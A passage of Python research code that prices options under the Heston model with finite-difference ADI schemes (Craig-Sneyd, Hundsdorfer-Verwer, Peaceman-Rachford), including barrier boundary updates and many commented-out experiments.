updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+a*A+BC #FIXME compute A from 0, then update rows according to BC as iBarrier moves!
lu = sla.splu(Li)
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F1 = lu.solve(F)
ti += a*dt
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+a*A+BC #FIXME compute A from 0, then update rows according to BC as iBarrier moves!
lu = sla.splu(Li)
updatePayoffBoundary(F1, Sc, B,iBarrier,M,L)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
elif method == "O4":
A = A0+A1+A2
# a1 = 1.0/(6 - 2*math.sqrt(6))
# a2 = 1.0/(2*(3+math.sqrt(6)))
# lu1 = sla.splu(I + a1*A+BC)
# lu2 = sla.splu(I + a2*A+BC)
Asq = A*A
Li0 = I+A+0.5*Asq+1.0/6*A*Asq
lu0 = sla.splu(Li0+BC)
lu = sla.splu(I+0.5*A+1.0/12*Asq+BC)
#F0 = F - A*F + 0.5*A*A*F - 1.0/6* A*A*A*F
#F1 = F0 - A*F0 + 0.5*A*A*F0 - 1.0/6* A*A*A*F0# A*F0 + 0.5*A*(I-A/3)*(A*F0)
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F0 = lu0.solve(F)
updatePayoffBoundary(F0, Sc, B,iBarrier,M,L)
F1 = lu0.solve(F0)
F = F1
for i in range(N-2):
Fr= F-0.5*A*(F - 1.0/6*A*F)
updatePayoffBoundary(Fr, S, B,iBarrier,M,L)
# F1 = lu2.solve(Fr)
# updatePayoffBoundary(F1, S, B,iBarrier,M,L)
F = lu.solve(Fr)
else:
if B == 0:
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+A+BC
lu = sla.splu(Li)
for i in range(N):
updatePayoffBoundary(F,Sc,B,iBarrier,M,L)
F = lu.solve(F)
else:
for i in range(N):
ti = T*(N-i-1)/N
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+A+BC
lu = sla.splu(Li)
updatePayoffBoundary(F,Sc,B,iBarrier,M,L)
F = lu.solve(F)
end=time.time()
#F[50+4*M]
#S0=101.52
Payoff = F.reshape(L,M)
#print("Payoff V=0",Payoff[0])
jv0 = np.searchsorted(V,v0)
#print("Payoff V=V0",V[jv0])
#for (si,pi) in zip(S, Payoff[jv0]):
# print(si, pi)
#
# # istrike =np.searchsorted(S,K)
# # print("Payoff S=K",S[istrike])
# # for (vi,pi) in zip(V, Payoff[:][istrike]):
# # print(vi, pi)
# plt.grid(True)
# plt.plot(S[:30], Payoff[jv0][:30])
# #plt.plot(V,Payoff[:][istrike])
# plt.yscale('symlog',linthreshy=1e-6)
# plt.show()
#Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
Payoffi = interpolate.RectBivariateSpline(V,X,Payoff,kx=3,ky=3,s=0)
maxError = 0.0
# Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
#print("spot method n m l price delta gamma error")
#Vp = [(Payoffi(v0,x,dy=2)[0][0]-Payoffi(v0,x,dy=1)[0][0])*np.exp(-2*(x)) for x in X]
#for Si, Vi in zip(S,Vp):
# print(Si, "HV-Euler", Vi)
#plt.grid(True)
## plt.plot(S, [Payoffi(v0,math.log(Si),dy=1)[0][0]/(Si) for Si in S])
#plt.plot(S, [Payoffi(v0,math.log(Si),dy=2)[0][0]/(Si*Si)-Payoffi(v0,math.log(Si),dy=1)[0][0]/(Si*Si) for Si in S])
## #plt.plot(V,Payoff[:][istrike]) d (dV/dx dx/ds) /dx dx/ds = d ( 1/)
## plt.yscale('symlog',linthreshy=1e-6)
#plt.show()
for spot,refPrice in zip(spotArray,priceArray):
xspot = math.log(spot)
price = Payoffi(v0,xspot)[0][0]
delta = Payoffi(v0,xspot,dy=1)[0][0]
gamma = Payoffi(v0,xspot,dy=2)[0][0]
error = price -refPrice
if abs(error) > maxError:
maxError = abs(error)
if B==0:
print(spot,method,N,M,L, price, delta,gamma,error,end-start)
if not B==0:
print(method,N,M,L,Payoffi(v0,math.log(K))[0][0],end-start)
# else:
# print(method,N,M,L,maxError,end-start)
def craigSneydBanded(N, F, I, A0, A1, A2,A1tri,A2tri, indices, indicesInv):
a = 0.5
A1tri*=a
A1tri[1,:]+=1
A2tri*=a
A2tri[1,:]+=1
for i in range(N):
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicit(Y0, S, B, iBarrier, M,L)
Y0r = Y0+a*A1*F
Y1 = la.solve_banded((1, 1), A1tri, Y0r, overwrite_ab=False,overwrite_b=True, check_finite=False)
Y1r = Y1+a*A2*F
Y1t = Y1r[indicesInv]
Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
Y2 = Y2t[indices]
Y0t = Y0 - 0.5*(A0*(Y2-F))
Y0r = Y0t+a*A1*F
Y1 = la.solve_banded((1, 1), A1tri, Y0r, overwrite_ab=False,overwrite_b=True, check_finite=False)
Y1r = Y1+a*A2*F
Y1t = Y1r[indicesInv]
Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
F = Y2t[indices]
return F
def hundsdorferVerwerBanded(N, F, I, A0, A1, A2,A1tri,A2tri, indices, indicesInv):
a = 0.5+math.sqrt(3)/6
A1tri*=a
A1tri[1,:]+=1
# A1tri[0]+= BCtri[0]
# A1tri[1]+= BCtri[1]
# A1tri[-1]+= BCtri[-1]
A2tri*=a
A2tri[1,:]+=1
# A2tri[0] += BC2tri[0]
# A2tri[1] += BC2tri[1]
# A2tri[-1] += BC2tri[-1]
for i in range(N):
Y0 = (I-A0-A1-A2)*F #explicit
Y0 = Y0+a*A1*F
#Y0 = (I-A0-(1-a)*A1-A2)*F #explicit
Y1 = la.solve_banded((1, 1), A1tri, Y0, overwrite_ab=False,overwrite_b=True, check_finite=False)
Y1 = Y1+a*A2*F
Y1t = Y1[indicesInv]
Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
Y2 = Y2t[indices]
Y0 = F-0.5*(A0+A1+A2)*(F+Y2)
Y0 = Y0+a*A1*Y2
#Y0 = F-0.5*(A0+A1+A2)*(F+Y2)+a*A1*Y2
Y1 = la.solve_banded((1, 1), A1tri, Y0, overwrite_ab=False,overwrite_b=True, check_finite=False)
Y1 = Y1+a*A2*Y2
Y1t = Y1[indicesInv]
Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
F = Y2t[indices]
return F
@jit(nopython=True)
def updatePayoffBoundary(F, S, B, iBarrier, M,L):
if not B == 0:
for j in range(L):
F[j*M:iBarrier +j*M] = 0
@jit(nopython=True)
def updatePayoffExplicit(F, S, B, iBarrier, M,L):
# Si-B * Vim + Vi * B-Sim =0
if not B == 0:
for j in range(L):
F[j*M:iBarrier-1 +j*M] = 0
F[iBarrier-1 +j*M] = F[iBarrier + j*M] * (S[iBarrier-1]-B)/(S[iBarrier]-B)
@jit(nopython=True)
def updatePayoffBoundaryTrans(F, S, B, iBarrierList, M,L):
if not B == 0:
for j in range(L):
iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
for ib in range(iBarrier):
F[ib+j*M] = 0
@jit(nopython=True)
def updatePayoffExplicitTrans(F, S, B, iBarrierList, M,L):
# Si-B * Vim + Vi * B-Sim =0
if not B == 0:
for j in range(L):
iBarrier =iBarrierList[j] #S[i-1]<B<=S[i]
F[j*M:(iBarrier-1 +j*M)] = 0
F[iBarrier-1 +j*M] = F[iBarrier + j*M] * (S[iBarrier-1]-B)/(S[iBarrier]-B)
#@jit(nopython=True)
def createSystemTrans(useExponentialFitting,B,iBarrierList,S,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L):
upwindingThreshold = 10.0
F = np.array(F0,copy=True)
dt = -T/N
A1 = lil_matrix((L*M,L*M))
A2 = lil_matrix((L*M,L*M))
BC = lil_matrix((L*M,L*M))
#boundary conditions, 0,0, 0,L-1, M-1,0, M-1,L-1.
if B == 0:
i=0
j=0
A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)/hm)
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
i=0
j=L-1
A1[i+j*M,(i+1)+j*M] += dt*((r-q)/hm)
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)/hm)
A2[i+j*M,i+j*M] += dt*(-r*0.5)
else:
j=0
iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
BC[iBarrier-1+j*M,iBarrier-1+j*M]=(S[iBarrier+j*M]-B)/(S[iBarrier+j*M]-S[iBarrier-1+j*M])-1
BC[iBarrier-1+j*M,iBarrier+j*M]=(B-S[iBarrier-1+j*M])/(S[iBarrier+j*M]-S[iBarrier-1+j*M])
# for i in range(iBarrier-1):
# A[i+j*M,i+(j)*M]=0.0
j=L-1
iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
BC[iBarrier-1+j*M,iBarrier-1+j*M]=(S[iBarrier+j*M]-B)/(S[iBarrier+j*M]-S[iBarrier-1+j*M])-1
BC[iBarrier-1+j*M,iBarrier+j*M]=(B-S[iBarrier-1+j*M])/(S[iBarrier+j*M]-S[iBarrier-1+j*M])
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
i=M-1
j=L-1
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)/(hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
i=M-1
j=0
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)/(hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#boundary conditions j=0,L-1.
j=0
iBarrier = 1
if not B == 0:
iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
for i in range(iBarrier,M-1):
#svj = sigma*sigma*V[j]/(JV[j])
#driftj = kappa*(theta-V[j])
svi = V[j]*(1+sigma*sigma*alpha*alpha+2*rho*sigma*alpha)
drifti = (r-q-0.5*V[j]+kappa*(theta-V[j])*alpha)
if useExponentialFitting:
if abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
#svi = svi + 0.5*abs(drifti)*hm
A1[i+j*M,(i+1)+j*M] += dt*(svi*0.5/(hm*hm)+drifti/(2*hm))
A1[i+j*M,i+j*M] += dt*(-svi/(hm*hm)-r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(svi*0.5/(hm*hm)-drifti/(2*hm))
A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
j=L-1
iBarrier = 1
if not B == 0:
iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
for i in range(iBarrier,M-1):
svi = V[j]*(1+sigma*sigma*alpha*alpha+2*rho*sigma*alpha)
drifti = (r-q-0.5*V[j]+kappa*(theta-V[j])*alpha)
if useExponentialFitting:
if abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
# svi = svi + 0.5*abs(drifti)*hm
A1[i+j*M,(i+1)+j*M] += dt*(svi*0.5/(hm*hm)+drifti/(2*hm))
A1[i+j*M,i+j*M] += dt*(-svi/(hm*hm)-r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(svi*0.5/(hm*hm)-drifti/(2*hm))
A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
for j in range(1,L-1):
#boundary conditions i=0,M-1.
iBarrier = 1
if B == 0:
i=0
A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)/(hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
else:
iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
BC[iBarrier-1+j*M,iBarrier-1+j*M]=(S[iBarrier+j*M]-B)/(S[iBarrier+j*M]-S[iBarrier-1+j*M])-1
BC[iBarrier-1+j*M,iBarrier+j*M]=(B-S[iBarrier-1+j*M])/(S[iBarrier+j*M]-S[iBarrier-1+j*M])
#A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl*2)) #makes it explode!
#A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl*2))
i=M-1
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)/(hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(2*JV[j]*hl))
#A2[i+j*M,i+(j+1)*M] += dt*(kappa*(theta-V[j])/(2*JV[j]*hl))
for i in range(iBarrier,M-1):
svj = sigma*sigma*V[j]/(JV[j])
driftj = kappa*(theta-V[j])
svi = V[j]*(1+sigma*sigma*alpha*alpha+2*rho*sigma*alpha)
drifti = (r-q-0.5*V[j]+kappa*(theta-V[j])*alpha)
if useExponentialFitting:
if abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
# svi = svi + 0.5*abs(drifti)*hm
if driftj != 0 and abs(driftj*hl/svj) > upwindingThreshold:
# svj = svj + 0.5*abs(driftj)*hl
svj = driftj*hl/math.tanh(driftj*hl/svj)
A1[i+j*M,(i+1)+j*M] += dt*(svi*0.5/(hm*hm)+drifti/(2*hm))
A1[i+j*M,i+j*M] += dt*(-(svi)/(hm*hm)-r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(svi*0.5/(hm*hm)-drifti/(2*hm))
A2[i+j*M,i+(j+1)*M] += dt*(0.5*svj/(JVm[j+1]*hl*hl)+driftj/(2*JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5-0.5*svj/(hl*hl)*(1.0/JVm[j+1]+1.0/JVm[j]))
A2[i+j*M,i+(j-1)*M] += dt*(0.5*svj/(JVm[j]*hl*hl)-driftj/(2*JV[j]*hl))
A1tri, A2tri, indices, indicesInv = createTridiagonalIndices(M,L)
# for i in range(M):
# for j in range(L):
# #A2tri[1,j+i*L] = A2[i+j*M,i+j*M]
# #if j < L-1:
# # A2tri[-1,j+i*L] = A2[i+(j+1)*M,i+(j)*M]
# if j >0:
# A2tri[0,j+i*L] = A2[i+(j-1)*M,i+(j)*M]
A0 = 0.0
return F,A0,A1,A2,BC,A1tri, A2tri, indices, indicesInv
def createTridiagonalIndices(M,L):
A1tri = np.zeros((3,M*L))
A2tri = np.zeros((3,M*L))
indices = np.zeros(M*L, dtype=int)
indicesInv = np.zeros(M*L, dtype=int)
for i in range(M):
#for j in range(i,L):
# F2t[i+j*M] = F2[j+i*M] #numpy reshape 2d array? L,M -> M,L needs to be done at each iter.
# F2t[j+i*M] = F2[i+j*M]
# other fast way: create index list and then F2t = F2[indexList]
# or nd.array.flatten C/R alternatively.
#A2t[i+j*M,:] = A2[j+i*M,:] #Ft will have reverse rows
for j in range(L):
indices[i+j*M]=j+i*L
indicesInv[j+i*L] = i+j*M
return A1tri, A2tri, indices, indicesInv
def objectivePayoff(K, lnK, hm, alpha, vj, xij, v):
#eterm = math.exp(xij-alpha*(vj-v))
#return np.maximum(eterm-K,0)
if xij < -hm+alpha*(vj-v)+lnK:
return 0.0
elif xij > hm+alpha*(vj-v)+lnK:
return -K + 2*(math.cosh(hm)-1)*math.exp(xij+alpha*(v-vj))/(hm*hm)
else:
eterm = math.exp(xij-alpha*(vj-v))
y0 = -lnK+xij-alpha*(vj-v)
if xij > alpha*(vj-v)+lnK: # i1 = int_0^h eterm*e(-y)-K , i2=int_-h,0 eterm(e(-y))-K
eY0 = K # eterm*math.exp(-y0)
i1 = (hm-1)/(hm*hm)*eterm + (eY0*(y0+1-hm) + K*y0*y0/2-K*hm*y0)/(hm*hm)
i2 = -K/2 + eterm*(math.exp(hm)-(hm+1))/(hm*hm)
return i1+i2
else:
i1 = 0.0
eY0 = K # eterm*math.exp(-y0)
i2 = eterm*math.exp(hm)/(hm*hm)-K/2*(1+y0*y0/(hm*hm)+2*y0/hm)-2*eY0*(y0+hm+1)/(2*hm*hm)
return i1+i2
#@jit(nopython=True)
def smoothKreissTrans(L,M,X,V,hm,alpha,K, sign, cFunc,F0):
for j in range(1,L-1):
for i in range(M):
xij = X[i]
vij = V[j]
hmt = hm
hlt = (V[j+1]-V[j-1])/2
payoff1 = lambda v,y: max(sign*(cFunc.evaluate(math.exp(xij-y-alpha*(vij-v)))-K),0)*(1-abs(y)/hmt)*(1-abs(v)/hlt)
#payoff1 = np.vectorize(payoff1)
value1 = integrate.dblquad(payoff1, -hmt, hmt, lambda x: -hlt, lambda x: hlt)
F0[i+j*M] = value1[0]/(hlt*hmt)
def priceCallTransformed(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, cFunc, K,B, N, M, L):
isCall = False
method = "PR" # "LODLS" "CS" "LS","CN","DO"
damping = "Euler" #"None" "One", "Euler"
smoothing = "None" #"None","Kreiss"
useVLinear = False
useExponentialFitting=True
alpha = -rho/sigma
epsilon = 1e-3
dChi = 4*kappa*theta/(sigma*sigma)
chiN = 4*kappa*math.exp(-kappa*T)/(sigma*sigma*(1-math.exp(-kappa*T)))
vmax = ncx2.ppf((1-epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
vmin = ncx2.ppf((epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
# print("vmax",vmin,vmax, 10*v0)
vmin=max(1e-3,vmin) #Peclet explodes at V=0!
#vmax=10*v0#0.28
V = np.linspace(vmin,vmax,L)
hl = V[1]-V[0]
JV=np.ones(L)
JVm=np.ones(L)
if not useVLinear:
vscale = v0*2
u = np.linspace(0,1,L) #1e-4,math.sqrt(vmax),L) #ideally, concentrated around v0: V=sinh((w-w0)/c). w unif
c1 = math.asinh((vmin-v0)/vscale)
c2 = math.asinh((vmax-v0)/vscale)
V = v0 + vscale*np.sinh((c2-c1)*u+c1)
hl = u[1]-u[0]
JV = vscale*(c2-c1)* np.cosh((c2-c1)*u+c1)
JVm = vscale*(c2-c1)* np.cosh((c2-c1)*(u-hl/2)+c1)
#case 1:
#Xspan = 6*math.sqrt(theta*T)
#case 2: Xspan = 10*math.sqrt(theta*T)
#5ok, 6 breaks on case 1!? 800x200
Xspan = 4*math.sqrt(theta*T) #max(4*math.sqrt(theta*T),(0.5*math.sqrt(v0*T)+abs(alpha*vmax))) #+abs(r-q)*T
Kinv = cFunc.solve(K)
Xmin = math.log(Kinv)-Xspan+alpha*v0
Xmax = math.log(Kinv)+Xspan+alpha*v0
#print("Xmin",Xmin,"Xmax",Xmax)
X = np.linspace(Xmin,Xmax,M)
hm = X[1]-X[0]
#V
# pecletL = np.zeros(L)
# pecletM = np.zeros(L)
# sCoeff = V*(1+sigma*sigma*alpha*alpha+2*rho*sigma*alpha)
# dCoeff = r-q-0.5*V+kappa*(theta-V)*alpha
# pecletM = dCoeff/sCoeff*hm
# sCoeff = sigma*sigma*V/(JV*JVm)
# dCoeff = kappa*(theta-V)/JV
# pecletL = dCoeff/sCoeff*hl
# print("PecletL",pecletL)
# print("PecletM",pecletM)
F0 = np.zeros(M*L)
S = np.zeros(M*L)
lnK = math.log(K)
sign = 1
if not isCall:
sign = -1
for j in range(L):
for i in range(M):
S[i+j*M]=np.exp(X[i]-alpha*V[j])
Sc = np.array([cFunc.evaluate(T,Si) for Si in S])
F0 = np.maximum(sign*(Sc-K),0)
if smoothing == "Kreiss":
smoothKreissTrans(L,M,X,V,hm,alpha, K,sign,cFunc,F0)
#payoff = lambda x: np.maximum(np.exp(x-alpha*V[j])-K,0)
#value = integrate.quadrature( payoff, X[iStrike]-hm/2, X[iStrike]+hm/2)
# int_xK^A exp(x-al*v)-K = exp(x-al*v)-K-K*(x-xK)
#xm = X[iStrike]+hm/2
#value = np.exp(xm-alpha*V[j])-K-K*(xm-xk) #int vm
#if j > 0 and j < L-1:
# value = (np.exp(xm-alpha*(V[j-1]+V[j])/2)-np.exp(xm-alpha*(V[j+1]+V[j])/2))/(alpha*(V[j+1]-V[j-1])/2)-K-K*(xm-xk)
#F0[iStrike+j*M] = value/hm
# for j in range(L):
# plt.grid(True)
# plt.plot(X, F0[j*M:j*M+M])
# plt.show()
iBarrierList = np.zeros(L,dtype='int')
for j in range(L):
iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
#print("iBarrierList",iBarrierList)
start = time.time()
F, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
end = time.time()
#print("setup matrices",end-start)
A1 = A1.tocsc()
A2 = A2.tocsc()
A1tri[1,:] = A1.diagonal(k=0)
A1tri[-1,:-1] = A1.diagonal(k=-1)
A1tri[0,1:] = A1.diagonal(k=1)
A2tri[1,:] = A2.diagonal(k=0)[indicesInv]
A2i = A2[:,indicesInv]
A2i = A2i[indicesInv,:]
#print("size",A2i.shape)
A2tri[-1,:-1] = A2i.diagonal(k=-1)
A2tri[0,1:] = A2i.diagonal(k=1)
# ab = np.ones((3, n - 1), dtype=float)
#ab[0,0] = 0 # Because top row is upper diag with one less elem
#ab[1, :] = 4
#ab[-1,-1] = 0 # Because bottom row is lower diag with one less elem
#
end = time.time()
#print("setup tri",end-start)
I = identity(M*L,format="csc")
start=time.time()
if damping == "Euler":
A = A0+A1+A2
a = 0.5
Li = I+a*A+BC
lu = sla.splu(Li)
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
F = lu.solve(F)
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
F = lu.solve(F)
N -= 1
if method == "EU":
A = A0+A1+A2
Li = I+A+BC
lu = sla.splu(Li)
for i in range(N):
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
F=lu.solve(F)
elif method == "CS":
a = 0.5
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
# A1tri*=a
# A1tri[1,:]+=1
# A2tri*=a
# A2tri[1,:]+=1
# def solveCS(a,F):
# for i in range(N):
# Y0 = F-(A0+A1+A2)*F #explicit
# Y1 = la.solve_banded((1, 1), A1tri, Y0+a*(A1*F), overwrite_ab=False,overwrite_b=True, check_finite=False)
# Y1t = Y1+a*(A2*F)
# Y1t = Y1t[indicesInv]
# Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
# Y2 = Y2t[indices]
# Y0 = Y2- 0.5*(A0*Y2-A0*F)
# Y1 = la.solve_banded((1, 1), A1tri, Y0+a*(A1*F), overwrite_ab=False,overwrite_b=True, check_finite=False)
# Y1t = Y1+a*(A2*F)
# Y1t = Y1t[indicesInv]
# Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
# F = Y2t[indices]
for i in range(N):
#updatePayoffExplicitTrans(F,S,B,iBarrierList,M,L)
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicitTrans(Y0,S,B,iBarrierList,M,L)
Y0r = Y0+a*A1*F
updatePayoffBoundaryTrans(Y0r,Sc,B,iBarrierList,M,L)
Y1 = lu1.solve(Y0r)
Y1r = Y1+a*A2*F
updatePayoffBoundaryTrans(Y1r,Sc,B,iBarrierList,M,L)
Y2 = lu2.solve(Y1r)
Y0t = Y0 - 0.5*(A0*Y2-A0*F)
Y0r = Y0t + a*A1*F
updatePayoffBoundaryTrans(Y0r,Sc,B,iBarrierList,M,L)
Y1t = lu1.solve(Y0r)
Y1r = Y1t+a*A2*F
updatePayoffBoundaryTrans(Y1r,Sc,B,iBarrierList,M,L)
Y2t = lu2.solve(Y1r)
F = Y2t
elif method == "DO":
a = 0.5
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
updatePayoffExplicitTrans(Y0r,Sc,B,iBarrierList,M,L)
Y0 = F-(A0+A1+A2)*F #explicit
Y0r = Y0+a*(A1*F)
updatePayoffBoundaryTrans(Y0r,Sc,B,iBarrierList,M,L)
Y1 = lu1.solve(Y0r)
Y1r = Y1+a*(A2*F)
updatePayoffBoundaryTrans(Y1r,Sc,B,iBarrierList,M,L)
Y2 = lu2.solve(Y1r)
F = Y2
# A1tri*=a
# A1tri[1,:]+=1
# A2tri*=a
# A2tri[1,:]+=1
# for i in range(N):
# Y0 = F-(A0+A1+A2)*F #explicit
# Y1 = la.solve_banded((1, 1), A1tri, Y0+a*(A1*F), overwrite_ab=False,overwrite_b=True, check_finite=False)
# Y1t = Y1+a*(A2*F)
# Y1t = Y1t[indicesInv]
# Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
# Y2 = Y2t[indices]
# #print("indices",indices)
# #print("indicesInv",indicesInv)
# #print("Zero?")
# #print(A2*Y2-(Y1+a*A2*F))
# F = Y2
# #raise Exception("print")
elif method == "PR": #peaceman-rachford strikwerda
a = 0.5
if B == 0:
A1tri*=a
A1tri[1,:]+=1
# A1tri[0]+= BCtri[0]
# A1tri[1]+= BCtri[1]
# A1tri[-1]+= BCtri[-1]
A2tri*=a
A2tri[1,:]+=1
# A2tri[0] += BC2tri[0]
# A2tri[1] += BC2tri[1]
# A2tri[-1] += BC2tri[-1]
if damping == "One":
Y1 = la.solve_banded((1, 1), A1tri, F, overwrite_ab=False,overwrite_b=False, check_finite=False)
Y1t = Y1[indicesInv]
Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=False, check_finite=False)
Y2t = la.solve_banded((1, 1), A2tri, Y2t, overwrite_ab=False,overwrite_b=False, check_finite=False)
Y2 = Y2t[indices]
Y1 = la.solve_banded((1, 1), A1tri, Y2, overwrite_ab=False,overwrite_b=False, check_finite=False)
F = Y1
N -= 1
#
# #A2triM = dia_matrix((A2tri,[1,0,-1]),shape=(M*L,M*L))
for i in range(N):
#updatePayoffExplicitTrans(F,S,B,iBarrierList,M,L)
Y0 = F-a*(A2*F)
Y1 = la.solve_banded((1, 1), A1tri,Y0, overwrite_ab=False,overwrite_b=True, check_finite=False)
Y1t = Y1-a*(A1*Y1)
Y1t = Y1t[indicesInv]
Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
F = Y2t[indices]
else:
#second system is not tridiag because of boundary
ti=T
dt = 1.0/N
updatePayoffExplicitTrans(F,Sc,B,iBarrierList,M,L) #FIXME ideally mirror F[ib-1] from F[ib]
if damping == "One":
ti -= dt*0.5
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
for j in range(L):
iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
Ftemp, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
lu1 = sla.splu(I+a*A1+BC)
F = lu1.solve(F)
updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
lu2 = sla.splu(I+a*A2+BC)
F = lu2.solve(F)
